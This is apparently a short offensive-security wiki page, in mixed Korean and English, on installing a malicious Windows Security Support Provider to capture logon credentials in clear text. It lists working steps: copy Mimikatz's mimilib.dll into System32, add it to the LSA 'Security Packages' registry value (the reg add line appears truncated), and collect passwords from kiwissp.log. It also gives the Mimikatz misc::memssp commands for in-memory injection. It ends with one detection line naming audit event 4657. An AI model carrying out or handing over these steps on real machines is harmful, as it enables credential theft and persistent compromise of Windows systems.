Custom SSP

Custom SSP

Learn what is a SSP (Security Support Provider) here. 당신은 자신의 SSP를 만들어 명확한 텍스트로 자격 증명을 캡처할 수 있습니다.

Mimilib

Mimikatz에서 제공하는 mimilib.dll 바이너리를 사용할 수 있습니다. 이것은 모든 자격 증명을 명확한 텍스트로 파일에 기록합니다. dll을 C:\Windows\System32\에 배치하십시오. 기존 LSA 보안 패키지 목록을 가져옵니다:

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

mimilib.dll을 보안 지원 공급자 목록(보안 패키지)에 추가합니다:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

And after a reboot all credentials can be found in clear text in C:\Windows\System32\kiwissp.log

In memory

You can also inject this in memory directly using Mimikatz (notice that it could be a little bit unstable/not working):

privilege::debug
misc::memssp

이것은 재부팅 시 유지되지 않습니다.

완화

이벤트 ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages의 감사 생성/변경